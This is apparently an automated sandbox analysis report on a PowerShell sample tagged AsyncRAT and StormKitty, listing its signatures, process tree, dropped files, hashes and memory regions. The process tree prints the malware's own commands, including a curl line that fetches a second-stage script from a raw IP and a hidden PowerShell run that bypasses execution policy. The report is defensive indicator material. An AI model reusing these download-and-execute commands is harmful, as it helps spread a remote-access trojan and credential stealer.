Analysis

  • max time kernel
    95s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-01-2025 03:00

General

  • Target

    b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff.ps1

  • Size

    21KB

  • MD5

    524fca1eea0f55f1ad6281325664dcb4

  • SHA1

    fa39a3bb823909c0294804a32303378ac25e0492

  • SHA256

    b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff

  • SHA512

    a8002af2535c7fa629b7375943ade44f36fe0b76ccc324ab35d09e96931f7e5fc82c88787a423ae96ad58d2683f870693edb6f5cbafdd4b6576f3d1a09ff24b2

  • SSDEEP

    384:zIAXUpjxl+K++gtu0P1GUK++qUpjxl6Upjxl+mATyK++IcmATpPsPWmATEP9rPva:zIAMVl+7+gbh7+3VlnVliTy7+IITJqKh

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops startup file 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3584
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Windows\system32\curl.exe
          curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1
          4⤵
            PID:3492
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4116
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ml5t1vzq\ml5t1vzq.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3412
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9EC0.tmp" "c:\Users\Admin\AppData\Local\Temp\ml5t1vzq\CSCFEED695757704D1E9F1E10D403F91AE.TMP"
              5⤵
                PID:1996
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
                PID:2296
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                4⤵
                  PID:3732
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:4324

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            556084f2c6d459c116a69d6fedcc4105

            SHA1

            633e89b9a1e77942d822d14de6708430a3944dbc

            SHA256

            88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

            SHA512

            0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

          • C:\Users\Admin\AppData\Local\Temp\RES9EC0.tmp

            Filesize

            1KB

            MD5

            f3ef9fafc4750a2416005a6ba76a9df4

            SHA1

            5bc8005a8181ceb20825d6e131d51db7317c0a3c

            SHA256

            74b1fc19798340cc84ff891ef62f74c906258861af9264adbb4cc775f85d85fc

            SHA512

            ce24e33f506d07ff138eb3844ae959a3eefa694e1c0699a16d2b050acc3b1e2ab15f37b6da6131cda578968c87e8439082d154f21385be3e114bc1c02c8d87b4

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jwnapbqf.osz.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\ml5t1vzq\ml5t1vzq.dll

            Filesize

            9KB

            MD5

            38cf9a116e1831996b0e1d2f1d294e15

            SHA1

            91de69064fdb9b6c38c4444ba8fe6b68d0305c6c

            SHA256

            b6a860dca0750d8ff6b6803a44f50ef3b2bc3f2298b2bf52a6240af41d617751

            SHA512

            7753fb86a93c4c48c9e272f29b75fd4c446d4799439add6477cd9d5a5f2204f74b5d6d8922d1756626fa9f41c4651301ec5c4544673573834048454937cfeb46

          • C:\Windows\Temp\Pack.bat

            Filesize

            5KB

            MD5

            380f7a432a6528223c05a2d48990827c

            SHA1

            ea7d06b5acda2f1afacd348fe64454fadaa4ece4

            SHA256

            cb6aaa288e92a75b77120f5996cddacf5374c5fcc3679f942554d52f740149c6

            SHA512

            cf16e64182cab9f2ecf9ae4351be69d0bce0833973f2071df76e1061cda9128c54392ffde006c64d41f4c26d3086cdcc85ea0410ecb29887f72f40db33a0c803

          • \??\c:\Users\Admin\AppData\Local\Temp\ml5t1vzq\CSCFEED695757704D1E9F1E10D403F91AE.TMP

            Filesize

            652B

            MD5

            c90f73d273b64fa011189e87e7115e0c

            SHA1

            50145ec3ec6d67b80c4e0b03aaad0e29f16579da

            SHA256

            3276613b4db621f8eeb95157a756a276b280e3e66e45e74f89105fe2ea28a61a

            SHA512

            c335dfe470ee9777a71775f8cef2c77ee7104963e332dce6ca867adb2e2592167500b6fbe43815d82cd3eea6195584fcc28ccb67bc9153155ad7ab0c27560725

          • \??\c:\Users\Admin\AppData\Local\Temp\ml5t1vzq\ml5t1vzq.0.cs

            Filesize

            10KB

            MD5

            4cffc8d6fe3870e0046b7be9bff146aa

            SHA1

            aee44d9772c5392c5da7237ba0090cbadfd4eeac

            SHA256

            e6518d89d7c8f761a277fe634fed0c41a4deee7c8d5cd4eaca503d88f247ec83

            SHA512

            42fa00f7ce8fb9f77f1c7b3b140bb6708d01609bbc77514e86d34c1ed82b2d6a0a4f4775674043c3e4a486e4e19f3dcf3c0d33f73fcd79e75126b2f42fac136a

          • \??\c:\Users\Admin\AppData\Local\Temp\ml5t1vzq\ml5t1vzq.cmdline

            Filesize

            204B

            MD5

            4307b1b3ab2b93b598893f0876a339d8

            SHA1

            3366e8852b686ba19932956f4255b963ec692ea9

            SHA256

            c682dd964e22843c41c4c0db1370b54332ee8f4eb0ba410386cb31148ebc7ca2

            SHA512

            de8abaa3904dcd2faf3d1e1c639aad9a4a56ccad8b8c843483c7c554907068714046f7e460861f933ff5bdce89e00a756fa250102f9024fe4de019840f29d548

          • memory/1192-0-0x00007FFE58A43000-0x00007FFE58A45000-memory.dmp

            Filesize

            8KB

          • memory/1192-1-0x00000147E70A0000-0x00000147E70C2000-memory.dmp

            Filesize

            136KB

          • memory/1192-11-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

            Filesize

            10.8MB

          • memory/1192-12-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

            Filesize

            10.8MB

          • memory/1192-18-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

            Filesize

            10.8MB

          • memory/4116-34-0x000001EBECD00000-0x000001EBECD0E000-memory.dmp

            Filesize

            56KB

          • memory/4116-51-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

            Filesize

            10.8MB

          • memory/4116-33-0x000001EBEDC90000-0x000001EBEDD06000-memory.dmp

            Filesize

            472KB

          • memory/4116-32-0x000001EBED820000-0x000001EBED864000-memory.dmp

            Filesize

            272KB

          • memory/4116-27-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

            Filesize

            10.8MB

          • memory/4116-21-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

            Filesize

            10.8MB

          • memory/4116-47-0x000001EBECD10000-0x000001EBECD18000-memory.dmp

            Filesize

            32KB

          • memory/4116-20-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

            Filesize

            10.8MB

          • memory/4324-49-0x0000000000400000-0x0000000000704000-memory.dmp

            Filesize

            3.0MB

          • memory/4324-52-0x0000000005CF0000-0x0000000006294000-memory.dmp

            Filesize

            5.6MB

          • memory/4324-53-0x0000000005B00000-0x0000000005B92000-memory.dmp

            Filesize

            584KB

          • memory/4324-54-0x0000000005850000-0x000000000585A000-memory.dmp

            Filesize

            40KB

          • memory/4324-57-0x0000000006980000-0x0000000006A1C000-memory.dmp

            Filesize

            624KB

          • memory/4324-58-0x0000000006A20000-0x0000000006A86000-memory.dmp

            Filesize

            408KB

          • memory/4324-59-0x0000000006DE0000-0x0000000006E02000-memory.dmp

            Filesize

            136KB

          • memory/4324-60-0x0000000006E10000-0x0000000007164000-memory.dmp

            Filesize

            3.3MB